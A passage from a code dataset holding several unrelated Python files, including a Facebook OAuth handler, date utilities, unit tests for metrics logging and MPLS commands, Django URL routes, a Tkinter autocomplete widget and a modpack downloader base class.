\"/@@facebook-auth\"\n registry = getUtility(IRegistry)\n settings = registry.forInterface(ISocialPublishControlPanel)\n fb_app_id = settings.fb_app_id\n fb_app_secret = settings.fb_app_secret\n\n code = self.request.form.get('code')\n if code is None:\n portal_messages.add(u\"Illegal access because nothing 'code'\", type=u\"error\")\n return self.request.RESPONSE.redirect(\"@@socialpublish-settings\")\n token_res = get_resource('/oauth/access_token', {'client_id': fb_app_id,\n 'redirect_uri': here_url,\n 'client_secret': fb_app_secret,\n 'code': code})\n fb_access_token = urlparse.parse_qs(token_res).get('access_token')\n try:\n fb_access_token_unicode = unicode(fb_access_token[0], 'utf-8')\n except IndexError:\n portal_messages.add(u\"Couldn't get Facebook token\", type=u\"error\")\n return self.request.RESPONSE.redirect(\"@@socialpublish-settings\")\n settings.fb_access_token = fb_access_token_unicode\n\n page_info_list = get_page_list(fb_access_token_unicode)\n settings.fb_page_info = fb_page_info_list_to_str(page_info_list)\n\n portal_messages.add(u\"Getting Facebook page information\", type=u\"info\")\n return self.request.RESPONSE.redirect(\"@@socialpublish-settings\")\n\n","sub_path":"collective/socialpublish/facebook_auth/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":2780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"75872116","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Users/breno/Envs/djangoplus/lib/python3.7/site-packages/djangoplus/utils/dateutils.py\n# Compiled at: 2019-04-13 18:22:56\n# Size of source mod 2**32: 2346 bytes\nimport datetime, calendar\nDAY_NAMES = [calendar.day_name[i].capitalize().split()[0] for i in range(0, 7)]\nDAY_INITIALS = [calendar.day_name[i][0:3].capitalize() for i in range(0, 7)]\nMONTH_NAMES = [calendar.month_name[i].capitalize() for i in range(1, 13)]\nMONTH_INITIALS = [calendar.month_name[i][0:3].capitalize() for i in range(1, 13)]\nDAY_NAMES_CHOICES = [[x, x] for x in DAY_NAMES]\nDAY_INITIALS_CHOICES = [[x, x] for x in DAY_INITIALS]\nMONTH_NAMES_CHOICES = [[x, x] for x in MONTH_NAMES]\nMONTH_INITIALS_CHOICES = [[x, x] for x in MONTH_INITIALS]\n\ndef calculate_age(birthday):\n today = datetime.date.today()\n return today.year - birthday.year - ((today.month, today.day) < (birthday.month, birthday.day))\n\n\ndef numer_of_days(start, end):\n delta = end - start\n return delta.days\n\n\ndef parse_date(date_string):\n if len(date_string) == 10:\n fmt = '%d/%m/%Y'\n else:\n fmt = '%d/%m/%Y %H:%M:%S'\n return datetime.datetime.strptime(date_string, fmt)\n\n\ndef add_months(sourcedate, months):\n month = sourcedate.month - 1 + months\n year = int(sourcedate.year + month / 12)\n month = month % 12 + 1\n day = min(sourcedate.day, calendar.monthrange(year, month)[1])\n return datetime.date(year, month, day)\n\n\ndef add_days(sourcedate, days):\n sourcedate = sourcedate or datetime.date.today()\n return sourcedate + datetime.timedelta(days=days)\n\n\ndef future(days):\n return datetime.date.today() + datetime.timedelta(days=days)\n\n\ndef past(days):\n return datetime.date.today() - datetime.timedelta(days=days)\n\n\ndef pretty_date(d):\n diff = datetime.datetime.now() - d\n s = diff.seconds\n if diff.days > 365 or diff.days < 0:\n return d.strftime('%d %b %y')\n if 60 > diff.days > 30:\n return '1 mês atrás'\n if diff.days > 60:\n return '{} meses atrás'.format(diff.days / 30)\n if diff.days == 1:\n return '1 dia atrás'\n if diff.days > 1:\n return '{} dias atrás'.format(diff.days)\n if s <= 1:\n return 'agora'\n if s < 60:\n return '{} segundos atrás'.format(s)\n if s < 120:\n return '1 minuto atrás'\n if s < 3600:\n return '{} minutos atrás'.format(s / 60)\n if s < 7200:\n return '1 hora atrás'\n return '{} horas atrás'.format(s / 3600)","sub_path":"pycfiles/djangoplus-0.0.98.tar/dateutils.cpython-37.py","file_name":"dateutils.cpython-37.py","file_ext":"py","file_size_in_byte":2603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"19843667","text":"import os\nimport glob\nimport unittest\nimport datetime\n\nfrom haymetric import Metrics, Units, Rotations\n\n\ndef remove_files(files):\n for f in glob.glob(files):\n os.remove(f)\n\n\ndef read_file_to_lines(filename):\n f = open(filename)\n lines = f.readlines()\n f.close()\n return lines\n\n\nclass TestHaymetric(unittest.TestCase):\n def setUp(self):\n self.log_path = \"tst/logs/Test.log\"\n # Wed, 11 May 2016 21:21:00 GMT\n self.sample_timestamp = 1463001660\n self.sample_logfile = self.__get_logfile(self.sample_timestamp)\n\n def tearDown(self):\n remove_files(self.log_path + \"*\")\n os.removedirs(\"tst/logs\")\n\n def test_emit_from_different_metrics(self):\n self.__assert_emit_metrics(\"service=MyTestProgram,market=Hanoi\",\n \"service=MyTestProgram,market=Hanoi\",\n \"method=GetAPI\", \"method=PushAPI\")\n\n def test_emit_metrics_with_dimensions_and_scopes_as_dict(self):\n self.__assert_emit_metrics({\"service\": \"MyTestProgram\", \"market\": \"Hanoi\"},\n {\"service\": \"MyTestProgram\", \"market\": \"Hanoi\"},\n {\"method\": \"GetAPI\"}, {\"method\": \"PushAPI\"})\n\n def test_rotation_when_time_changes(self):\n # Wed, 11 May 2016 20:33:01 GMT\n t1 = 1462998781\n # Wed, 11 May 2016 21:33:01 GMT\n t2 = 1463002381\n\n metrics = Metrics(self.log_path, \"service=MyTestProgram,market=Hanoi\")\n self.__add_values(metrics.get_scope(\"method=GetAPI\"))\n metrics.flush(t1)\n self.__add_counters(metrics.get_scope(\"method=PushAPI\"))\n metrics.flush(t2)\n metrics.close()\n t1_lines = read_file_to_lines(self.__get_logfile(t1))\n t2_lines = read_file_to_lines(self.__get_logfile(t2))\n self.assertEqual(4, len(t1_lines))\n self.assertEqual(\"Timestamp=1462998781\\n\", t1_lines[0])\n self.assertEqual(\"Dimensions=market=Hanoi,method=GetAPI,service=MyTestProgram\\n\", t1_lines[1])\n self.assertEqual(\"Metrics=NoUnit=999+1,DBTime=10ms,Time=1200+800ms\\n\", t1_lines[2])\n self.assertEqual(\"---------\\n\", t1_lines[3])\n self.assertEqual(4, len(t2_lines))\n self.assertEqual(\"Timestamp=1463002381\\n\", t2_lines[0])\n self.assertEqual(\"Dimensions=market=Hanoi,method=PushAPI,service=MyTestProgram\\n\", t2_lines[1])\n self.assertEqual(\"Metrics=Failed=2,Pushes=11\\n\", t2_lines[2])\n self.assertEqual(\"---------\\n\", t2_lines[3])\n\n def test_multiple_rotations(self):\n metrics_minutely = Metrics(self.log_path, \"service=MyTestProgram,market=Hanoi\", Rotations.MINUTELY)\n metrics_minutely.flush()\n self.assertTrue(os.path.isfile(self.__get_logfile(rotation=Rotations.MINUTELY)))\n metrics_hourly = Metrics(self.log_path, \"service=MyTestProgram,market=Hanoi\", Rotations.HOURLY)\n metrics_hourly.flush()\n self.assertTrue(os.path.isfile(self.__get_logfile(rotation=Rotations.HOURLY)))\n metrics_daily = Metrics(self.log_path, \"service=MyTestProgram,market=Hanoi\", Rotations.DAILY)\n metrics_daily.flush()\n self.assertTrue(os.path.isfile(self.__get_logfile(rotation=Rotations.DAILY)))\n\n def test_multiple_units(self):\n metrics = Metrics(self.log_path, \"service=MyTestProgram,market=Hanoi\")\n scope = metrics.get_scope()\n scope.add_value(\"NanoSecond\", 1, Units.NANOSECOND)\n scope.add_value(\"MicroSecond\", 2, Units.MICROSECOND)\n scope.add_value(\"MilliSecond\", 3, Units.MILLISECOND)\n scope.add_value(\"Second\", 4, Units.SECOND)\n scope.add_value(\"Minute\", 5, Units.MINUTE)\n scope.add_value(\"Hour\", 6, Units.HOUR)\n scope.add_value(\"Byte\", 7, Units.BYTE)\n scope.add_value(\"KiloByte\", 8, Units.KILOBYTE)\n scope.add_value(\"MegaByte\", 9, Units.MEGABYTE)\n scope.add_value(\"GigaByte\", 10, Units.GIGABYTE)\n metrics.flush(self.sample_timestamp)\n metrics.close()\n log_lines = read_file_to_lines(self.sample_logfile)\n self.assertEqual(4, len(log_lines))\n self.assertEqual('Timestamp=1463001660\\n', log_lines[0])\n self.assertEqual('Dimensions=market=Hanoi,service=MyTestProgram\\n', log_lines[1])\n self.assertEqual(\n \"Metrics=MilliSecond=3ms,Hour=6h,KiloByte=8kb,NanoSecond=1ns,GigaByte=10gb,Second=4s,MicroSecond=2us,Byte=7b,MegaByte=9mb,Minute=5m\\n\",\n log_lines[2])\n self.assertEqual('---------\\n', log_lines[3])\n\n def test_get_empty_scope(self):\n metrics = Metrics(self.log_path, \"service=MyTestProgram,market=Hanoi\")\n self.__add_values(metrics.get_scope())\n metrics.flush(self.sample_timestamp)\n metrics.close()\n log_lines = read_file_to_lines(self.sample_logfile)\n self.assertEqual(4, len(log_lines))\n self.assertEqual('Timestamp=1463001660\\n', log_lines[0])\n self.assertEqual('Dimensions=market=Hanoi,service=MyTestProgram\\n', log_lines[1])\n self.assertEqual('Metrics=NoUnit=999+1,DBTime=10ms,Time=1200+800ms\\n', log_lines[2])\n self.assertEqual('---------\\n', log_lines[3])\n\n def test_reset_after_flush(self):\n metrics = Metrics(self.log_path, \"service=MyTestProgram,market=Hanoi\")\n self.__add_values(metrics.get_scope(\"method=GetAPI\"))\n metrics.flush(self.sample_timestamp)\n self.__add_counters(metrics.get_scope(\"method=PushAPI\"))\n metrics.flush(self.sample_timestamp)\n metrics.flush(self.sample_timestamp)\n metrics.flush(self.sample_timestamp)\n metrics.close()\n log_lines = read_file_to_lines(self.sample_logfile)\n self.assertEqual(8, len(log_lines))\n self.assertEqual('Timestamp=1463001660\\n', log_lines[0])\n self.assertEqual('Dimensions=market=Hanoi,method=GetAPI,service=MyTestProgram\\n', log_lines[1])\n self.assertEqual('Metrics=NoUnit=999+1,DBTime=10ms,Time=1200+800ms\\n', log_lines[2])\n self.assertEqual('---------\\n', log_lines[3])\n self.assertEqual('Timestamp=1463001660\\n', log_lines[4])\n self.assertEqual('Dimensions=market=Hanoi,method=PushAPI,service=MyTestProgram\\n', log_lines[5])\n self.assertEqual('Metrics=Failed=2,Pushes=11\\n', log_lines[6])\n self.assertEqual('---------\\n', log_lines[7])\n\n def test_scope_override_and_multiple_updates(self):\n metrics = Metrics(self.log_path, \"service=MyTestProgram,market=Hanoi,method=PushAPI\")\n scope1 = metrics.get_scope(\"method=GetAPI , host = 1.2.3.4\")\n scope1.add_counter(\"CountIt\", 1)\n scope2 = metrics.get_scope(\" host = 1.2.3.4 , methoD=GetAPI\")\n scope2.add_counter(\"CountIt\", 8)\n metrics.flush(self.sample_timestamp)\n metrics.close()\n log_lines = read_file_to_lines(self.sample_logfile)\n self.assertEqual(4, len(log_lines))\n self.assertEqual('Timestamp=1463001660\\n', log_lines[0])\n self.assertEqual('Dimensions=host=1.2.3.4,market=Hanoi,method=GetAPI,service=MyTestProgram\\n', log_lines[1])\n self.assertEqual('Metrics=CountIt=9\\n', log_lines[2])\n self.assertEqual('---------\\n', log_lines[3])\n\n def test_scope_override(self):\n metrics = Metrics(self.log_path, \"service=MyTestProgram,market=Hanoi,method=PushAPI\")\n scope = metrics.get_scope(\"method=GetAPI\")\n scope.add_counter(\"MyCounter\", 1)\n metrics.flush(self.sample_timestamp)\n metrics.close()\n log_lines = read_file_to_lines(self.sample_logfile)\n self.assertEqual(4, len(log_lines))\n self.assertEqual('Timestamp=1463001660\\n', log_lines[0])\n self.assertEqual('Dimensions=market=Hanoi,method=GetAPI,service=MyTestProgram\\n', log_lines[1])\n self.assertEqual('Metrics=MyCounter=1\\n', log_lines[2])\n self.assertEqual('---------\\n', log_lines[3])\n\n def test_dimension_normalization(self):\n metrics = Metrics(self.log_path, \"maRket=Hanoi , SerViCe=MyTestProgram\")\n scope = metrics.get_scope(\"mEthod=PushAPI\")\n scope.add_counter(\"Success\", 9)\n metrics.flush(self.sample_timestamp)\n metrics.close()\n log_lines = read_file_to_lines(self.sample_logfile)\n self.assertEqual(4, len(log_lines))\n self.assertEqual('Timestamp=1463001660\\n', log_lines[0])\n self.assertEqual('Dimensions=market=Hanoi,method=PushAPI,service=MyTestProgram\\n', log_lines[1])\n self.assertEqual('Metrics=Success=9\\n', log_lines[2])\n self.assertEqual('---------\\n', log_lines[3])\n\n def test_counters_and_values(self):\n metrics = Metrics(self.log_path, \"service=MyTestProgram,market=Hanoi\")\n scope = metrics.get_scope(\"method=PushAPI\")\n self.__add_counters(scope)\n self.__add_values(scope)\n metrics.flush(self.sample_timestamp)\n metrics.close()\n log_lines = read_file_to_lines(self.sample_logfile)\n self.assertEqual(4, len(log_lines))\n self.assertEqual('Timestamp=1463001660\\n', log_lines[0])\n self.assertEqual('Dimensions=market=Hanoi,method=PushAPI,service=MyTestProgram\\n', log_lines[1])\n self.assertEqual('Metrics=Failed=2,Pushes=11,NoUnit=999+1,DBTime=10ms,Time=1200+800ms\\n', log_lines[2])\n self.assertEqual('---------\\n', log_lines[3])\n\n def __get_logfile(self, timestamp=None, rotation=Rotations.HOURLY):\n now = datetime.datetime.now()\n if timestamp:\n now = datetime.datetime.fromtimestamp(timestamp)\n if rotation is Rotations.MINUTELY:\n return self.log_path + \".\" + now.strftime(\"%Y-%m-%d-%H-%M\")\n if rotation is Rotations.HOURLY:\n return self.log_path + \".\" + now.strftime(\"%Y-%m-%d-%H\")\n if rotation is Rotations.DAILY:\n return self.log_path + \".\" + now.strftime(\"%Y-%m-%d\")\n\n def __assert_emit_metrics(self, dimension1, dimension2, scope1, scope2):\n metrics1 = Metrics(self.log_path, dimension1)\n self.__add_values(metrics1.get_scope(scope1))\n metrics1.flush(self.sample_timestamp)\n metrics1.close()\n metrics2 = Metrics(self.log_path, dimension2)\n self.__add_counters(metrics2.get_scope(scope2))\n metrics2.flush(self.sample_timestamp)\n metrics2.close()\n log_lines = read_file_to_lines(self.sample_logfile)\n self.assertEqual(8, len(log_lines))\n self.assertEqual('Timestamp=1463001660\\n', log_lines[0])\n self.assertEqual('Dimensions=market=Hanoi,method=GetAPI,service=MyTestProgram\\n', log_lines[1])\n self.assertEqual('Metrics=NoUnit=999+1,DBTime=10ms,Time=1200+800ms\\n', log_lines[2])\n self.assertEqual('---------\\n', log_lines[3])\n self.assertEqual('Timestamp=1463001660\\n', log_lines[4])\n self.assertEqual('Dimensions=market=Hanoi,method=PushAPI,service=MyTestProgram\\n', log_lines[5])\n self.assertEqual('Metrics=Failed=2,Pushes=11\\n', log_lines[6])\n self.assertEqual('---------\\n', log_lines[7])\n\n @staticmethod\n def __add_counters(scope):\n scope.add_counter(\"Pushes\", 10)\n scope.add_counter(\"Pushes\", 1)\n scope.add_counter(\"Failed\", 1)\n scope.add_counter(\"Failed\", 1)\n\n @staticmethod\n def __add_values(scope):\n scope.add_value(\"Time\", 1200, Units.MILLISECOND)\n scope.add_value(\"Time\", 800, Units.MILLISECOND)\n scope.add_value(\"DBTime\", 10, Units.MILLISECOND)\n scope.add_value(\"NoUnit\", 999)\n scope.add_value(\"NoUnit\", 1)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"tests/test_haymetric.py","file_name":"test_haymetric.py","file_ext":"py","file_size_in_byte":11490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"140256192","text":"from mtcnn.mtcnn import MTCNN\n\nclass mtcnn_to_face_alignment:\n def __init__(self):\n self.detector = MTCNN()\n\n def find_bboxes(self, input_img):\n \"\"\"\n Recieve: an image\n\n Return: list of bbox format (x1, y1, x2, y2)\n \"\"\"\n faces_positions = self.detector.detect_faces(input_img)\n #format: (x1, y1, w, h) y probabilidad pero no interesa\n bbox_list = []\n if (len(faces_positions)!=0):\n for face in faces_positions:\n bbox = face['box']\n bbox_formated = [[bbox[0], bbox[1], bbox[0]+bbox[2], bbox[1]+bbox[3]]]\n bbox_list.append(bbox_formated)\n return bbox_list\n\n def size_of_bbox(self, bbox):\n \"\"\"\n return:\n multiplication of width x height\n \"\"\"\n return bbox[2]*bbox[3]\n #terminar\n def mtcnn_bbox_face_alignment_format_a(self, input_img):\n \"\"\"\n Recieve: an image\n\n Return: the biggest bbox format (x1, y1, x2, y2)\n \"\"\"\n max_size_box = 0\n size_box = 0\n bbox_to_return = None\n faces_positions = self.detector.detect_faces(input_img)\n #format: (x1, y1, w, h) y probabilidad pero no interesa\n bbox_list = []\n if (len(faces_positions)!=0):\n for face in faces_positions:\n bbox = face['box']\n size_box = size_of_bbox(bbox)\n if (size_box > max_size_box):\n bbox_to_return = bbox\n ###terminar para bbox return en nuevo formato\n bbox = bbox_to_return\n bbox_formated = [[bbox[0], bbox[1], bbox[0]+bbox[2], bbox[1]+bbox[3]]]\n bbox_list.append(bbox_formated)\n return bbox_list\n","sub_path":"mtcnn_to_face_alignment.py","file_name":"mtcnn_to_face_alignment.py","file_ext":"py","file_size_in_byte":1741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"184714663","text":"from sys import argv\nfrom os.path import exists\n\nscript, from_file, to_file = argv \n\nprint(\"Coping from {} to {}.\".format(from_file,to_file))\n\n#we could do these two on one line too, how?\n#in_file = open(from_file)\n#indata = in_file.read()\n\nindata = open(from_file).read()\n\nprint(\"The input file is {} bytes long.\".format(len(indata)))\n\nprint(\"Does the output file exists? {}\".format(exists(to_file)))\nprint(\"Ready, hit RETURN to continue, CTRL-C to abort.\")\ninput()\n\nout_file = open(to_file,'w')\nout_file.write(indata)\n\nprint(\"All right, all done.\")\n\nout_file.close()\n","sub_path":"ex17.py","file_name":"ex17.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"244321045","text":"from django.conf.urls import patterns, include, url\nfrom settings import APP_ROOT\n\nurlpatterns = patterns('',\n url(r'^$', 'register_users.views.home', name='home'),\n\n url(r'^static/(?P.*)$', 'django.views.static.serve', {'document_root': APP_ROOT+'static/'}),\n\n url(r'^uploads/(?P.*)$', 'django.views.static.serve', {'document_root': APP_ROOT+'uploads/'}),\n\n url(r'^media/img/(?P.*)$', 'django.views.static.serve', {'document_root': APP_ROOT+'uploads/photos/'}, name='images_link'),\n\n url(r'^accounts/', include('register_users.urls')),\n\n url(r'^msg/', include('private_message.urls')),\n\n url(r'^friend/', include('friends_app.urls')),\n\n url(r'^media/', include('media_app.urls')),\n\n url(r'^music/', include('music_app.urls')),\n\n url(r'^settings/', include('settings_app.urls')),\n\n url(r'^find/', include('find_app.urls'))\n)\n","sub_path":"djangoproj/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"461565645","text":"import os\nimport sys\nimport traceback\nfrom unittest import mock\n\nfrom click.testing import CliRunner\n\nfrom .mock_tables import dbconnector\n\nimport config.main as config\nimport show.main as show\nfrom utilities_common.db import Db\n\nshow_interfaces_mpls_output=\"\"\"\\\nInterface MPLS State\n------------ ------------\nEthernet2 enable\nEthernet4 disable\nEthernet8 disable\nEthernet16 disable\nLoopback0 disable\nPortChannel2 disable\nVlan2 enable\n\"\"\"\n\nshow_interfaces_mpls_specific_output=\"\"\"\\\nInterface MPLS State\n----------- ------------\nEthernet2 enable\n\"\"\"\n\nmodules_path = os.path.join(os.path.dirname(__file__), \"..\")\ntest_path = os.path.join(modules_path, \"tests\")\nsys.path.insert(0, modules_path)\nsys.path.insert(0, test_path)\nmock_db_path = os.path.join(test_path, \"mpls_input\")\n\n\nclass TestMpls(object):\n @classmethod\n def setup_class(cls):\n print(\"SETUP\")\n os.environ['UTILITIES_UNIT_TESTING'] = \"1\"\n\n def test_config_mpls_add(self):\n runner = CliRunner()\n db = Db()\n obj = {'config_db':db.cfgdb}\n\n result = runner.invoke(config.config.commands[\"interface\"].commands[\"mpls\"].commands[\"add\"], [\"Ethernet4\"], obj=obj)\n print(result.exit_code)\n print(result.output)\n assert result.exit_code == 0\n assert db.cfgdb.get_entry(\"INTERFACE\", \"Ethernet4\") == {\"mpls\": \"enable\"}\n\n def test_config_mpls_remove(self):\n runner = CliRunner()\n db = Db()\n obj = {'config_db':db.cfgdb}\n\n result = runner.invoke(config.config.commands[\"interface\"].commands[\"mpls\"].commands[\"remove\"], [\"Ethernet4\"], obj=obj)\n print(result.exit_code)\n print(result.output)\n assert result.exit_code == 0\n assert db.cfgdb.get_entry(\"INTERFACE\", \"Ethernet4\") == {\"mpls\": \"disable\"}\n\n def test_show_interfaces_mpls(self):\n jsonfile = os.path.join(mock_db_path, 'appl_db')\n dbconnector.dedicated_dbs['APPL_DB'] = jsonfile\n\n runner = CliRunner()\n result = runner.invoke(show.cli.commands[\"interfaces\"].commands[\"mpls\"], [])\n print(result.exit_code)\n print(result.output)\n assert result.exit_code == 0\n assert result.output == show_interfaces_mpls_output\n\n def test_show_interfaces_mpls_specific(self):\n jsonfile = os.path.join(mock_db_path, 'appl_db')\n dbconnector.dedicated_dbs['APPL_DB'] = jsonfile\n\n runner = CliRunner()\n result = runner.invoke(show.cli.commands[\"interfaces\"].commands[\"mpls\"], [\"Ethernet2\"])\n print(result.exit_code)\n print(result.output)\n assert result.exit_code == 0\n assert result.output == show_interfaces_mpls_specific_output\n\n @classmethod\n def teardown_class(cls):\n print(\"TEARDOWN\")\n os.environ['UTILITIES_UNIT_TESTING'] = \"0\"\n dbconnector.dedicated_dbs['APPL_DB'] = None\n","sub_path":"tests/mpls_test.py","file_name":"mpls_test.py","file_ext":"py","file_size_in_byte":2879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"108273441","text":"'''\nCreated on Nov 30, 2018\n\n@author: vahidrogo\n'''\n\nfrom tkinter import ttk\n\n\nclass ComboboxAutoComplete(ttk.Combobox):\n '''\n Adds typing autocomplete functionality to the Combobox widget\n from the ttk module.\n \n %d = Type of action (1=insert, 0=delete, -1 for others)\n %i = index of char string to be inserted/deleted, or -1\n %P = value of the entry if the edit is allowed\n %s = value of entry prior to editing\n %S = the text string being inserted or deleted, if any\n %v = the type of validation that is currently set\n %V = the type of validation that triggered the callback\n (key, focusin, focusout, forced)\n %W = the tk name of the widget\n '''\n \n \n def __init__(self, parent, selected_function=None, value_list=[], **kwargs):\n super().__init__(parent, **kwargs)\n \n self.selected_function = selected_function\n self.value_list = []\n \n if value_list:\n self.set_value_list(value_list)\n \n self.cursor_position = 0\n \n vcmd = (self.register(self._on_validate), '%d', '%i', '%P')\n \n self.config(validate='key', validatecommand=vcmd)\n \n self.bind('<>', self._selected)\n self.bind('', self._selected)\n self.bind('', self._key_handler)\n \n \n def _selected(self, event=None):\n value = self.get()\n \n if value and value in self.value_list:\n if self.selected_function:\n self.icursor('end')\n self.select_range(0, 'end')\n \n self.selected_function()\n \n \n def _key_handler(self, event):\n keysm = event.keysym\n \n if keysm in ['Return', 'Right']:\n self._selected()\n \n elif keysm in ['BackSpace', 'Left']:\n self.delete(self.cursor_position, 'end')\n \n self.cursor_position += 1\n self.icursor(self.cursor_position)\n \n \n def _on_validate(self, d, i, P):\n '''\n Args:\n d: type of action \"1\" = insert, \"0\" = delete, \"-1\" = others \n i: index of char string to be inserted\n P: value of entry if the edit is allowed\n '''\n # if a character is being inserted\n if d == '1':\n self.cursor_position = int(i) + 1\n \n if P:\n match_value = ''\n \n for value in self.value_list:\n if value.lower().startswith(P.lower()):\n match_value = value \n \n break\n \n if match_value:\n self.set(match_value)\n \n # places the cursor after the character that was just inserted\n self.icursor(self.cursor_position)\n \n # highlights all the characters to the right of the one inserted\n self.select_range(self.cursor_position, 'end')\n \n return True\n \n \n def set_value_list(self, value_list):\n self.config(values=value_list)\n \n self.value_list = value_list\n \n","sub_path":"comboboxautocomplete.py","file_name":"comboboxautocomplete.py","file_ext":"py","file_size_in_byte":3378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"244304794","text":"from abc import ABC, abstractmethod\nimport os\nimport urllib.request\nimport io\nimport os\n\nclass AbstractModpack(ABC):\n __slots__=('title','description')\n @abstractmethod\n def __init__(self, slug, title, summary, description):\n self.slug = slug\n self.title = title\n self.summary = summary\n self.description = description\n self._on_disk_path = os.path.expanduser('~/.local/share/minefish/'+slug)\n os.makedirs(self._on_disk_path, exist_ok=True)\n\n def _getimage(self, imagetype):\n \"\"\"\n Read from disk and return an image.\n :param imagetype: should be one of either 'icon' or 'background', but may be any legal filename\n :return: a PIL.Image, if we are able, or None if we are not\n \"\"\"\n try:\n from PIL import Image\n except ImportError:\n return None\n candidates = [x for x in os.listdir(self._on_disk_path) if x.startswith(imagetype+os.path.extsep)]\n if candidates:\n return Image.open(os.path.join(self._on_disk_path, candidates[0]))\n else:\n image_bytes, image_extension = self._get_image_bytes(imagetype)\n if not image_bytes:\n return None\n image = Image.open(io.BytesIO(image_bytes)) # if this fails we shouldn't be saving it to disk anyway.\n if image_extension:\n with open(os.path.join(self._on_disk_path, imagetype+os.path.extsep+image_extension), 'wb') as f:\n f.write(image_bytes)\n return image\n\n @abstractmethod\n def _get_image_bytes(self, image_type):\n \"\"\"Return a 2-tuple of a bytes object containing the contents of an image file, which will be written to disk\n by the caller, and a file extension without the leading dot. image_type will be one of either \"icon\",\n in which case you should return a small image suitable for displaying next to the modpack name and details in\n the pack list, or \"background\", in which case return a larger image suitable for displaying behind the\n modpack's detailedinfo. In case you cannot return an image, return a 2-tuple (None, None).\n If you do not want the file to be cached to disk (for example, because it was sourced from the executable),\n return a bytes object and None as the extension.\n\n It is up to the implementation to make sense (or not) of alternate values for image_type; the stock UI will\n never call get_image() with anything other than those two values, although third party code may. If you don't\n know what to do, return (None,None).\n \"\"\"\n return (None, None)\n\n\n def download(self, version:str=None):\n \"\"\"\n Download the modpack from whatever server using whatever means you find most suitable.\n :param version: Optional parameter specifying one element from the list returned by getVersionList(),\n or None (or omitted) for the latest version.\n :return: None\n \"\"\"\n pass\n\n @abstractmethod\n def _download(self, version:str=None):\n \"\"\"\n Take a version string and return an iterator in Swordfish CSV format specifying to the downloader what to do.\n The Swordfish CSV format is highly flexible but in case it is insufficient this method may have side effects.\n\n :param version:\n :return: An iterator following the sfpds CSV format.\n \"\"\"\n\n @abstractmethod\n def getVersions(self):\n return []\n\n\n","sub_path":"swordfish_launcher/downloader/modpack.py","file_name":"modpack.py","file_ext":"py","file_size_in_byte":3509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"504670000","text":"# ARID3A.train.labels.tsv\nimport os\n\n\ndef parse_binding_site(tsv_path, dir_path, out_path):\n openi = open(dir_path + tsv_path)\n b_file = open(out_path + \"bind.\" + tsv_path, 'w')\n for k in openi:\n k = k.rstrip()\n if k.startswith(\"chr\\tstart\"):\n b_file.write(k + \"\\n\")\n if \"B\" in k:\n b_file.write(k + \"\\n\")\n openi.close()\n b_file.close()\n\ndef main():\n dir_path = \"/home/callsobing/dream10/data/ChIPseq/label/\"\n out_path = \"/home/callsobing/dream10/process/ChIP-seq/label/\"\n for i in os.listdir(dir_path):\n if i.endswith(\".tsv\"):\n parse_binding_site(i, dir_path, out_path)\n\n\nif __name__ == '__main__':\n main()","sub_path":"parse_all_bind_site.py","file_name":"parse_all_bind_site.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"360103892","text":"#!/usr/bin/env python3\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\nimport matplotlib\nimport os\n\n\n# plotting constants\nPERCENTILE_CATEGORIES = [20, 50, 70, 90]\nCOLOR_CATEGORIES = [\"#000033\", \"#000099\", \"#0000ff\", \"#6666ff\"]\nPERCENTILE_TICKS = [0, 20, 40, 60, 80, 100]\nGRID_ALPHA = 0.2\nLINE_ALPHA = 0.1\nMARKER_ALPHA = 0.6\nTITLE_FONT = 16\nAXIS_FONT = 14\nMAIN_FONT = 12\nLABEL_FONT = 10\nMAIN_COLOR = 'k'\nSECONDARY_COLOR = \"r\"\nMAIN_LINEWIDTH = 1\nMARKER_SIZE = 2\nBAR_WIDTH = 0.85\nHISTOGRAM_BINS = 50\nPNG_DPI = 300\n\n\ndef initialize_plot_style():\n \"\"\"\n Set matplotlib visual style\n Returns: None\n\n \"\"\"\n matplotlib.style.use('ggplot')\n plt.rcParams['lines.linewidth'] = MAIN_LINEWIDTH\n plt.rcParams['axes.facecolor'] = 'w'\n plt.rcParams['xtick.color'] = MAIN_COLOR\n plt.rc('xtick', labelsize=LABEL_FONT)\n plt.rc('ytick', labelsize=LABEL_FONT)\n\n\ndef load_host_links(filename):\n print(f\"Loading data from {filename}\")\n data = dict()\n with open(filename) as input:\n for i, line in enumerate(input):\n cut = line.strip().split(\"\\t\")\n if i == 0:\n if cut[0] != \"mobile_contig_name\" or \\\n cut[5] != \"cluster_name\" or \\\n cut[14] != \"mobile_element_copies_per_cell\":\n raise ImportError(\"not a good master table\")\n continue\n virus = cut[0]\n bacteria = cut[5]\n copy_count = float(cut[14])\n adjusted_inter_vs_intra_ratio = float(cut[16])\n if adjusted_inter_vs_intra_ratio < 0.1:\n continue\n if virus not in data:\n data[virus] = list()\n data[virus].append(copy_count)\n return data\n\n\ndef load_validation(filename):\n print(f\"Loading data from {filename}\")\n data = dict()\n with open(filename) as input:\n for i, line in enumerate(input):\n cut = line.strip().split(\"\\t\")\n if i == 0:\n continue\n threshold = float(cut[0])\n support = float(cut[-1])\n data[threshold] = support\n return data\n\n\ndef categorize_data_for_roc_analysis(host_data, min_value, max_value, increment):\n \"\"\"\n Go over and generate copy count 